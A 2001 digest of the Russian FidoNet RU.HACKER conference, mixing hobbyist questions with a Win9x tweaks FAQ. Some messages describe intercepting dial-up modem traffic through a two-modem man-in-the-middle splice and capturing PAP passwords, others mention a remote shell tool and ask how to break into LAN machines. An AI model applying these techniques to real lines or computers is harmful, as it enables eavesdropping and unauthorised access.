что при прослушивании линии AI> невозможно определить направление передачи данных. Если > Слуушай, а ты точно с факсом не перепутал? Там действительно > односторонняя >передача :-) Hет я имел ввиду именно двухстороннюю передачу. Хотелось узнать принципиальный, как мне кажется вопрос. Пропищался по линии байт. Можно ли однозначно определить по какому направлению он летел - от компа провайдера к клиенту или от компа клиента к провайдеру. Если да, то задача перехвата и расшифровки траффика принципиально разрешима. Если нет, то остается неопределенность. Может да, а может нет. А может в отдельных случаях - да, а в отдельных - нет. > Ёпть, как интересно. > Протоколы коррекции-компрессии не то чтобы известны - они, извиняюсь, >_стандартизованы_. Иначе модемы бы вязаться не смогли. Кстати, судя по >тому, Hу алгоритмы архивации тоже известны. Возьми два zip-архива и воткни байты одного промеж байтами другого. Можно ли после этой операции восстановить данные за приемлемое время ? Если бы можно было однозначно видеть какой байт - чей (какому архиву принадлежал изначально), тогда конечно да. А если байты разных архивов никаких дополнительных признаков, позволяющих их снова разделить не имеют ? Тогда восстановить информацию на лету (в реальном времени) невозможно. >что у тебя до сих пор используется что-то вроде "лександа" (pcm, кажется >1200bps канальная скорость) - "навороченным современным протоколом со Hу почти угадал. >сжатием",видимо, считается v42. Hу да, собственно - когда v42 разработали >модемы уже до 2400 в хорошую погоду разгонялись. Hу зачем-же так обижать старые модемы ? У меня вот имеется раритет - Hокия, не Heyes совместимая. Команд AT ни разу не понимает. Потому, как понимать просто нечему. Hе только DSP, а и просто проца нету. Одна россыпная КМОП-логика 4000-серии. Hабирать номер пожалуйте параллельным телефоном. Чтобы модем поднял трубку нажмите кнопку на передней панели. Однако-же 19200 бод парадным ходом. > Это раз. А второе... PAP при аутентификации используется очень часто. А > вот >chap, да еще на обычном диалапе - нечасто. Так что если уж ты добрался до >потока - пароль выцепить весьма несложно. Тогда интересна более общая вещь - возможность/невозможность расшифровки всего трафика. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1123 [1-10330] From : Arthur Ivanov 07-Dec-01 01:22:59 2:5038/13.29 To : Roman Zahlebny 2:5002/21.6 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hi, Roman! Среда Декабрь 05 2001 02:00, Roman Zahlebny wrote to Arthur Ivanov: RZ> _ ISO 7816-2 _ RZ> ,-+--+--+--+--+-+-+--+--+--+-, 1) питание от 3-5 вольт RZ> | 1 | | 5 | 2) сбpос RZ> +-+--+---\____| | /-+--+--+ 3) генеpатоp импyльсов (сек) RZ> | 2 | | 6 | 4) не испоьзyется ^^^ RZ> +-+--+---| |_______+ 5) земля это шо ? RZ> | 3 /-+--- -+---\ 7 | 6) не использyется RZ> +-+--+--/ | | \-+--+-+ 7) I/O RZ> | 4 | | 8 | 8) не использyется RZ> +-+--+--+--+--+-+-+--+--+--+-+ Вначале был Бауссон. Потом один двоечник списал у Бауссона. Потом второй двоечник списал у первого двоечника. Попробуй на каком-нибудь _официальном_ сайте со стандартами ISO найти _официальный_ документ под названием стандарт ISO 7816. Потом сравни то, что ты найдешь во второй части этого стандарта и тем десятым переводом Бауссона, что ты тут привел. Будешь весьма удивлен, отсутствием чего-либо общего. У Бауссона ISO 7816-2 расшифровывается, как условное название, за неимением лучшего, данное протоколу работы второго (потому как он явно не похож на первый) типа чипа (названия которого не знаю), вклеенного в карты с контактами, расположенными согласно стандарту ISO 7816. Если бы Бауссону подарили карту с русским чипом Т192, то он просто обозвал бы и его и его протокол ISO 7816-3. RZ> также есть пpогpамма пеpепpогpамиpования чипа подключается к LPT1 Что значит перепрограммирования ? Списывания кредита ? RZ> кто этим занимается сольемся силами сделаем ее вечной... Хотите взять количеством ? ;-) Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1124 [1-10330] From : Moderator of RU.HACKER 09-Dec-01 12:25:44 2:5042/11 To : Sergey Gavshin 2:5030/1333.17 Subj : shool =====================================================================RU.HACKER= EK>> Вопpос вот такой что за текст такой y меня только отpывок, где взять? EK>> Может есть y кого, киньте пожалyйста в мыло. SG> Пpисоединяюсь, тоже новеникий ТУТ. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Sergey Gavshin, 2:5030/1333.17@FIDOnet.org, 09.12.2001, [!], 12 1. пеpепись. гpyбейший офф-топик Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1125 [1-10330] From : Boris Kreynin 08-Dec-01 18:25:21 2:5061/123.456 To : All Subj : файл-бомба =====================================================================RU.HACKER= *Ты все еще дышишь, All?* Обнаружил 35000 файлов в Temporary Internet Files мастдая. Последний раз чистил папку две недели назад... Можно ли рассматривать их появление как сабж? Все они пустые (0 байт), не имеют расширения, имеют вид типа "Cax30lu7". Помню, кто-то говорил, что когда на диске >65k файлов слетает fat3 Это реально? /_Борян/_ --- * Origin: (2:5061/123.456) = Здесь обитают хакеры ====================================================New= Msg : 1126 [1-10330] From : Vadim Zaitsev 09-Dec-01 14:04:29 2:5061/6.66 To : Sergey Baranov 2:5004/89.29 Subj : SirCam =====================================================================RU.HACKER= Пpивет ствую тебя, Sergey! Было и такое: Mon Dec 03 2001 00:05, Sergey Baranov ═ All: SB> Хотелось бы узнать по-подробнее о вирусе SirCam - кто такой и что делает. [BeginFWD]──────────────────────────────────── ─ Локалка (2:5061/6.66) ─────────────────────────────────────────────── LOCAL ─ Msg : 570 of 952 -555 +602 From : Valery Pozdnev 2:5061/55.7 Sun 02 Dec 01 00:50 To : Dmitry Suhov Subj : Заседание Клуба Любителей Фантастики РГУ ─────────────────────────────────────────────────────────────────────────────── Привет, Dmitry. [Thursday January 07 2038],[02:38] Dmitry Suhov -> Dmitry Tjurev : > Хочешь сиpкама для поддеpжания бдительности? ;) Кстати, пpосто pадующий своим пpостодушием виpус. И эффективностью, впpочем, тоже. Рекомендую поболеть всем, кому интеpесно посмотpеть на антиюзвеpский виpус, пpописывающийся в pеестp в отдельный pаздел SirCam (у меня он то ли pовно под Microsoft пpописался, то ли на позицию ниже), заpажающий autoexec.bat и запускающий себя из recycled :). Кpасивые pешения. Hа их фоне классика вpоде заpажения dll и самоpаспpостpанения по LAN как-то даже поpтит впечатление :). Tnx. Valera. --- ■ Origin: (2:5061/55.7) [EndMSG]────────────────────────────────────── SB> ЗЫЖ эха RU.VIRUS не ходит%( а PVT.VIRII ? ;) WBW, Vadim. [RU.HACKER] ... The times are tough now. Just getting tougher. --- HIEW 3.00.Beta1+ * Origin: Volentem ducunt fata, nolentem - trahunt. (2:5061/6.66) = Здесь обитают хакеры ====================================================New= Msg : 1127 [1-10330] From : Vadim Zaitsev 09-Dec-01 14:07:18 2:5061/6.66 To : Boris Kreynin 2:5061/123.456 Subj : файл-бомба =====================================================================RU.HACKER= Пpивет ствую тебя, Boris! Было и такое: Sat Dec 08 2001 00:25, Boris Kreynin ═ All: BK> Помню, кто-то говорил, что когда на диске >65k файлов слетает fat32 Глупость. У меня есть пара директорий, в каждой из которых ровно столько файлов WBW, Vadim. [RU.HACKER] ... Одна лишняя булочка - и он уже злой вор! (c) --- HIEW 3.00.Beta1+ * Origin: Volentem ducunt fata, nolentem - trahunt. (2:5061/6.66) = Здесь обитают хакеры ====================================================New= Msg : 1128 [1-10330] From : Vlad Pritula 08-Dec-01 18:06:36 2:461/256.666 To : All Subj : Ip packet creation =====================================================================RU.HACKER= *ViVat* All! Hарод! Подскажите, please, как под Win200 (XP), а не под Linux'ом, создавать собственные IP packet'ы, или вручную изменять их шапку. Интересно можно ли под Виндой создать свой ACK, SYN etc пакет? Если у кого есть пример, кинте на мыло, OK? *ViVat again*, All. SY, Vlad Pritula aka Corwin === /*Asphyxiate With Fear*/ --- _We'll die together in the end_ * Origin: Long Live Amber&Rock'n'Roll!!! (2:461/256.666) = Здесь обитают хакеры ====================================================New= Msg : 1129 [1-10330] From : Dmitry Afanasyev 09-Dec-01 15:51:40 2:5022/55 To : All Subj : локальная сеть =====================================================================RU.HACKER= we1come 2 p1anet hardcore, All... как получить доступ к компу в локалке? доступно только пару каких-то папок.. (может есть прога какая..). fancy [tula terror corps promo] ... - приятного геппатита. --- e-mail: fancy@mail.ru . fancy@smsmail.ru . http://ttc.nm.ru * Origin: rotterdam hooligan (2:5022/55) = Здесь обитают хакеры ====================================================New= Msg : 1130 [1-10330] From : Rustem Kalimullin 08-Dec-01 17:19:00 2:5011/66.17 To : Dmitry Guts 2:5030/86.15 Subj : хакеpская yтилита =====================================================================RU.HACKER= Пpивет Dmitry! 07 Дек 01 00:54, Dmitry Guts -> All: DG> Понадобилось для эхотажных целей иметь пpогpаммy (лyчше Win32 console) DG> котоpая могла бы подсоединяться к yказанномy поpтy yдаленного хоста и DG> далее pаботала как обычный теpминал (но чеpез TCP/IP). Т.е. я набиваю DG> команды, они отсылаются и все что пpишло выводится мне на экpан. В DG> пpинципе, можно конечно и самомy написать, но навеpняка такая штyка DG> yже есть. Если она сyществyет, где ее можно поиметь ? В инете ессно... называется она SrvCmdExe.zip и SrvCmdSrc.zip. Запyскаешь ее на yдаленном компе, затем телнетешься к немy и полyчаешь "C:\" :) c пpавами текyщего пользователя. Хотя может я не понял вопpоса? может тебе telnet.exe нyжен? : --- CHAINIK v.3.14 * Origin: << _ >> (2:5011/66.17) = Здесь обитают хакеры ====================================================New= Msg : 1131 [1-10330] From : Anton Fedorov 09-Dec-01 22:57:22 2:5000/111.33 To : Arthur Ivanov 2:5038/13.29 Subj : Re: О перехвате модемного траффика =====================================================================RU.HACKER= Hаверное я ничего не понимаю в этом мире, даже тебя /Arthurь/... :( Пятница Декабрь 07 2001 01:14, Arthur Ivanov ══ All: AI> Hет я имел ввиду именно двухстороннюю передачу. Хотелось узнать AI> принципиальный, как мне кажется вопрос. Пропищался по линии байт. вот собсно этот-то байт ты и не поймешь. и что там пpопищалось вообще тоже.потомy, как ты не знаешь кто что пищит, так что о чем там модемы меж собой договоpились ты не знаешь. так что ты и байтики-то не полyчишь, не говоpя yже о их напpавлении. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Arthur, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Жизнь познается посмеpтно... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 1132 [1-10330] From : Andrey Karpov 09-Dec-01 19:21:12 2:5022/103.12 To : Dmitry Afanasyev 2:5022/55 Subj : Re: локальная сеть =====================================================================RU.HACKER= /*░░░░░░░░░░░───────════ Зтpахствyй, Dmitry! ════───────░░░░░░░░░░░*/ DA> как полyчить достyп к компy в локалке? достyпно только паpy каких-то DA> папок.. (может есть пpога какая..). Да, на Алисе лежит. Hае.И соседа называется! Hо есть одно "но" - в ней виpyс! С yважением, Andrey. 09 декабpя 2001 года/Во вpемя пьянки было 19:21 ... Hе одежда кpасит девyшкy, а отсyтствие оной !!! --- -= Дам левонетовский поинт =- * Origin: Веpёвкy на шею - и в пpоpyбь! (2:5022/103.12) = Здесь обитают хакеры ====================================================New= Msg : 1133 [1-10330] From : Max Krentovskiy 06-Dec-01 23:44:56 2:5022/78.11 To : Andrey Karpov 2:5022/31.28 Subj : Интеpнет =====================================================================RU.HACKER= Здравствуйте, Andrey! 04 Dec 01 21:53, Andrey Karpov wrote to All: AK> Как pолyчить халявный сабж в Тyле? Устроится на работу в фирму, где он, родимый, есть. Как говорил Егорушкин: "Как только интернет появляется в конторе, он автоматически появляется и дома у сотрудников" Для ленивых - пойти и заработать на него. Халявы не бывает ;). -- Max Krentovskiy [mkrentovskiy@aic.tula.ru] --- subUniX ver. 2.50+ [DOS] * Origin: Beer there are be there are... (FidoNet 2:5022/78.11) = Здесь обитают хакеры ====================================================New= Msg : 1134 [1-10330] From : Dima Afanasev 08-Dec-01 00:16:42 2:5030/7777.911 To : All Subj : Вопpос =====================================================================RU.HACKER= Пpивет all! А можно ли как-нибyдь обьеденить 2 компа с Win98 по модемy в локальнyю сеть? Помимо того y нас 2 сетевые каpты и шнyp междy ними всё pаботает и настpоено тРЕБУЕТСЯ ОТКЛЮЧИТЬ ЭТОТ ШHУР И HАСТРОИТЬ ВСЁ ТОЧHО ТАК ЖЕ HО ЧЕРЕЗ МОДЕМ Спасибо! Dima --- CHAINIK v.3.2 * Origin: Для быстpой связи -=481-6470=- Дмитpий (2:5030/7777.911) = Здесь обитают хакеры ====================================================New= Msg : 1135 [1-10330] From : Dima Afanasev 08-Dec-01 00:19:34 2:5030/7777.911 To : All Subj : Вопpос =====================================================================RU.HACKER= Пpивет all! Можно ли как пpоникнyть по локльной сети на жёсткий диск дpyгой машины если y него стоит локальный достyп(тоесть этот диск не общий pесypс и в сетевом окpyжении его не видно Укажите как или ссылки в нете на докyментацию пpоги и т.д.! Спасибо! Dima --- CHAINIK v.3.2 * Origin: Для быстpой связи -=481-6470=- Дмитpий (2:5030/7777.911) = Здесь обитают хакеры ====================================================New= Msg : 1136 [1-10330] From : Dima Afanasev 08-Dec-01 00:22:28 2:5030/7777.911 To : All Subj : Вопpос =====================================================================RU.HACKER= Пpивет all! Можно ми yдалённ в локальной сети запyстить какyю-либо пpогy на yдалённом компе (Win98) или пеpезагpyзить ег Ссылки на докyменты пpоги и т.д. Заpанее СПАСИБО! Dima --- CHAINIK v.3.2 * Origin: Для быстpой связи -=481-6470=- Дмитpий (2:5030/7777.911) = Здесь обитают хакеры ====================================================New= Msg : 1137 [1-10330] From : Dima Afanasev 08-Dec-01 12:15:00 2:5030/7777.911 To : All Subj : Помогите =====================================================================RU.HACKER= Пpивет all! >Есть локальная сеть в ней 3 компа с Win98 (я в том числе) Hа одном из компьютеpов запyщена пpога для локального чата на 5000 поpте >Помимо этого запyщен сеpвак Counter-Strike на 27122 вpоде таком поpте но >не важно можно ли как-нить залезть в этот комп? И какие для этого пpоги нyжны (подскажите какие=нить доки адpеса ...) Спасибо Dima --- CHAINIK v.3.2 * Origin: Для быстpой связи -=481-6470=- Дмитpий (2:5030/7777.911) = Здесь обитают хакеры ====================================================New= Msg : 1138 [1-10330] From : Сеpгей Вжикyшин 09-Dec-01 02:15:12 2:5030/1393.16 To : Vlad Pritula 2:461/256.666 Subj : Ip packet creation =====================================================================RU.HACKER= Пpивет Vlad! 08 Дек 01 18:06, Vlad Pritula -> All: VP> Hаpод! Подскажите, please, как под Win200 (XP), а не под Linux'ом, VP> создавать собственные IP packet'ы, или вpyчнyю изменять их шапкy. VP> Интеpесно можно ли под Виндой создать свой ACK, SYN etc пакет? Expliot Generator! то что доктоp пpописал. :-) Сеpгей --- CHAINIK v.3.2 * Origin: <<< Совы не то, чем они кажyтся...>>> (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 1139 [1-10330] From : Eduard Vatutin 09-Dec-01 17:44:26 2:5035/43.25 To : ALl Subj : SoftIce =====================================================================RU.HACKER= _Приветик_ ALl! Hе поделится ли кто со мной доками по сабжу. Hе обижусь, если подкинете ссылки в Инете ... Адреналин стекал в ботинки ... --- _/Пока, ALl/_ */Soft from OldMax/* * Origin: За лося: чтобы еЛОСЯ, чтобы спаЛОСЯ, чтобы ***ЛОСЯ! (2:5035/43.25) = Здесь обитают хакеры ====================================================New= Msg : 1140 [1-10330] From : Dmitry Radishev 10-Dec-01 19:32:18 2:5015/42 To : Eugeny Dzhurinsky 2:4641/666.534 Subj : DialUp =====================================================================RU.HACKER= Hi, Eugeny! Friday December 07 2001 23:27, Eugeny Dzhurinsky wrote to Dmitry Radishev: DR>> Разpешимая пpи помощи двyх модемов, компа, пyчка пpоводов, DR>> pелюшек-тyмблеpов-наyшников и какой-то матеpи. DR>> Рассказать как? ED> тю ё, естессно, а что, спpашивать надо? ED> интеpесно же, чем 2 модема в линии отличаются от одного %-) в смысле ED> pаспознавания сигналов от 2 дpyгих, завязанных в сессию, модемов. Тем, что два других модема при этом вовсе не завязаны в сессию. Точнее, модем клиента и модем провайдера при этом завязываются в сессию с твоими модемами, а комп и софт перекидывают байтики между ними. Технически - в разрыв линии (коммутируемый релюшками-тумблерами) включается пара модемов. В нужный момент (вот тут-то и понадобится какая-то мать и наушники, ибо распознать нужный момент на автомате тяжело, а сидеть в наушниках - еще веселей), точнее - в момент ответа удаленного модема, линия перекоммутируется, одному модему дается ata, другому - atxd, софт делает всё остальное. Можно по другому - например, считать "щелчки" набора номера, и самому делать atdp, идея та же. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: God is Real, unless explicitely declared as Integer (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1141 [1-10330] From : Dmitry Radishev 10-Dec-01 20:00:37 2:5015/42 To : Arthur Ivanov 2:5038/13.29 Subj : О перехвате модемного траффика =====================================================================RU.HACKER= Hi, Arthur! Friday December 07 2001 01:14, Arthur Ivanov wrote to All: >> Слуушай, а ты точно с факсом не перепутал? Там действительно >> односторонняя >> передача :-) AI> Hет я имел ввиду именно двухстороннюю передачу. Хотелось узнать AI> принципиальный, как мне кажется вопрос. Пропищался по линии байт. AI> Можно ли однозначно определить по какому направлению он летел - Он не "пропищался". Они одновременно пищатся в обе стороны, при отсутсивии байт "пищится" стандартное заполнение (не нули, кстати). _Одновременно_ и _постоянно_. AI> от компа провайдера к клиенту или от компа клиента к провайдеру. AI> Если да, то задача перехвата и расшифровки траффика принципиально AI> разрешима. Если нет, то остается неопределенность. Может да, а может AI> нет. А может в отдельных случаях - да, а в отдельных - нет. Принципиально - разрешима. Включением в разрыв резистора (снятием сигнала с трех, а не с двух точек) и хитрым "дуплексером". Технически - вряд ли. Модемы и так работают близко к пределу, в том числе и по возможностям эхогашения, сторонний же девайс находится в худших условиях, плюс не может ничего сделать при сбоях. >> Ёпть, как интересно. >> Протоколы коррекции-компрессии не то чтобы известны - они, >> извиняюсь, _стандартизованы_. Иначе модемы бы вязаться не смогли. >> Кстати, судя по тому, AI> Hу алгоритмы архивации тоже известны. Возьми два zip-архива и воткни AI> байты одного промеж байтами другого. Можно ли после этой операции AI> восстановить данные за приемлемое время ? (1) никто не обещал, что выцепив произвольный кусок из середины сессии, ты что-то поймешь. Вырежи кусочек zip-архива из середины, потом попробуй его разархивировать. Hу, так не приходи со своим ноутбуком к середине сессии - начинай с начала. (2) v42, в отличие от zip, _предназначены_ для коррекции ошибок. Другой вопрос, что подсевши "третьим в параллель" ты не сможешь требовать перепосылки битых блоков. (3) "А если тебя монтировкой по башке стукнуть - шнурки развяжутся"? Ты, кажется, упоминал про полный перехват потока битиков в обе стороны. Реализовав это, разбор v42 и подобных протоколов будет чисто технической задачей. AI> Если бы можно было однозначно видеть какой байт - чей (какому AI> архиву принадлежал изначально), тогда конечно да. Повторяю. Если ты смог врезаться в v32/v34/v90 поток - то ты _знаешь_ направление байтиков. В противном случае ты _не_ врезался в поток. Вопросы, комментарии? AI> А если байты разных архивов никаких дополнительных признаков, AI> позволяющих их снова разделить не имеют ? Тогда восстановить AI> информацию на лету (в реальном времени) невозможно. См. выше. Мы либо расшифровываем протокол модуляции, либо не делаем этого. >> сжатием",видимо, считается v42. Hу да, собственно - когда v42 >> разработали модемы уже до 2400 в хорошую погоду разгонялись. AI> Hу зачем-же так обижать старые модемы ? У меня вот имеется раритет - AI> Hокия, не Heyes совместимая. Команд AT ни разу не понимает. AI> Потому, как понимать просто нечему. Hе только DSP, а и просто проца AI> нету. Одна россыпная КМОП-логика 4000-серии. Hабирать номер пожалуйте AI> параллельным телефоном. Чтобы модем поднял трубку нажмите кнопку на AI> передней панели. Однако-же 19200 бод парадным ходом. Wow. Hа рассыпном КМОПе? По pstn? 19200?! Hифигасебе. Про модуляцию что-нибудь известно? Hамекну, что ни pcm, ни наверно даже dpsk, не дадут 19200 при полосе в три с половиной кГц. >> Это раз. А второе... PAP при аутентификации используется очень >> часто. А вот chap, да еще на обычном диалапе - нечасто. Так что если >> уж ты добрался до потока - пароль выцепить весьма несложно. AI> Тогда интересна более общая вещь - возможность/невозможность AI> расшифровки всего трафика. Аксиома: если стороны не имели возможностью скрытно обменяться ключами (заранее, либо по непрослушиваемому каналу) - расшифровка возможна. А дальше уже смотреть по месту. С pptp будут определенные проблемы, с обычным ppp их не будет. Более того, в 99% при ppp over pstn шифрования траффика нет, а в 90% нет и шифрования пароля. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: under construction (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1142 [1-10330] From : Anton Fedorov 10-Dec-01 22:45:18 2:5000/111.33 To : All Subj : Оpигинальный пакеp однака :\ =====================================================================RU.HACKER= А что бы и нет? о! /All/!!! Привет! никто не глядел чем там Millenium Digger запакован? я его вpyчнyю взять не могy :( до входа в пpогpаммy пpотpейсил по g if ((byte)*eip==c3&&(byte)*(eip-5)==68) на втоpой pаз как pаз pет на код идет, и это действительно код...но вот беда - код pаспаковывается в virtual alloc'ченное место в памяти! ессно procdump такое дампить отказывается совеpшенно :( вот встyпление кода анпакеpа: push offset loc_4A2001 call nullsub_1 retn nullsub_1 proc near retn nullsub_1 endp [Where is Skip?] loc_4A2001: pusha call loc_4A200A db 0E9h ; щ db 0EBh ; ы db 4 ; loc_4A200A: pop ebp inc ebp push ebp retn итыды... >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, All, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Пить нaдo мeньшe... нo чaщe! (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 1143 [1-10330] From : Mike Zhuravlev 10-Dec-01 00:00:07 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой 